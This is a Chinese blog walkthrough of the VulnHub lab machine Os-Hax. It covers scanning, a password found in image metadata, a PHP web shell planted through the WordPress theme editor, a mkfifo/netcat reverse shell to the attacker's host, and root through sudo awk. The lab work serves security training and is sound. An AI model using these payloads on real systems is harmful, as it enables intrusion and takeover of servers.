vulnhub靶机 Os-Hax

已于 2023-06-20 00:47:57 修改
阅读量89 收藏
点赞数
分类专栏: Vulfocus打靶 文章标签: 安全
于 2023-06-18 21:39:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52178795/article/details/131275025
版权

下载靶机

地址 :hackNos: Os-Hax ~ VulnHub

问题阐述

使用virtualbox,kali和靶机均使用桥接网络

kali:172.20.10.10 靶机:172.20.10.12

打靶目标

获取到root权限

打靶过程

信息搜集

nmap主机探活,做端口扫描

nmap -v -sP 172.20.10.1/24

nmap -sV -sC 172.20.10.12

gobuster 扫描目录 发现一个wordpress 和其他路径

gobuster dir -u http://172.20.10.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt      // -w指定字典路径

直接做访问 发现提示文件flaghost.png

 下载 flaghost.png 查看图片属性 exiftool flaghost.png 得到字符 passwd@45

 本俩以为是wordpress账号密码,尝试发现不是,最后发现是路径,直接访问有一个flag2.txt文件

,打开是加密字符,在线解密(Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]),获得flag

web:Hacker@4514

 权限提升

修改hosts文件。做域名解析

vim /etc/hosts

写入以下内容

172.20.10.12 localhost

 直接访问:http://localhost/wordpress/wp-admin/theme-editor.php?file=header.php&theme=twentynineteen

写入一句话木马 <?php system($_POST['cmd']);?>

进行反弹shell

本地开启监听

nc -lvnp 9001

burpsuit 抓包写反弹shell,等待本地接收连接

cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.20.10.10+9001+>/tmp/f

 切换到交互式shell

python3 -c 'import pty;import pty.spawn("/bin/bash")'

用之前获取到的信息进行登录

su web
输入密码 Hacker@4514

 特权提升

sudo -l 看到可以使用 awk 命令

调用 system 函数成功提权到 root  
sudo awk '{ system("/bin/bash")}'

凉城木槿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHubOs-Hax
weixin_39219503的博客
01-05 382
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/hacknos-os-hax,389/ 题目信息如下,难度中等 Back To The Top Difficulty : Intermediate Flag : boot-root Learing : exploit | web application Security | Privilege Es...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub-Os-hax
wwxxss
03-16 142
使用strings查看图片的信息 strings 命令在对象文件或二进制文件中查找可打印的字符串。gobuster dir -iu "http:192.168.56.106/" -w 字典 -x 格式( html,txt,bak,php)根据提示我们可以发现是一个wordpress站点,所以我们可以扫描wordpress站点下的目录。结果并没有什么发现,通过wp发现在根目录下有个img目录有个flaghost.png,我们使用。得到了一个brainfuck加密的密码,我们丢到解密网站解开查看。
靶机Os-Hax测试笔记
qq_56426046的博客
01-05 480
下载ova文件,直接virtual Box打开,可能出现一些问题,关闭USB选择网络模式等等。网络用桥接,开启过程没有失败,可以访问网站代表搭建成功。首先编辑 vi /etc/hosts 192.168.1.102 localhost 访问。访问目录 /img/发现存在目录写浏览。修改/etc/sudoers 文件。修改/etc/sudoers 文件。切换 python shell。
Os-Hax靶机测试
weixin_58729813的博客
04-08 246
本文是针对vulnhub靶机测试,拿到两个flag即可
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 306
IDF版本:4.4.7。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 560
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1052
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 422
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 674
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
[图解]SysML和EA建模住宅安全系统-08-安全企业用例图
rolt的专栏
07-03 681
因为主辅只是针对某个用例而言
[图解]SysML和EA建模住宅安全系统-11-接口块
最新发布
rolt的专栏
07-06 495
当然内部块图里面肯定要比这个丰富
【前端】技巧 js 监听所有A标签 拦截 用于安全跳转等
我是Superman丶的博客
07-04 206
【前端】技巧 监听所有A标签 拦截 用于安全跳转等。
O2OA(翱途)开发平台 V9.1 即将发布,更安全、更高效、更开放
liyi_hz2008的博客
07-02 557
新版本更新 敬请关注
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值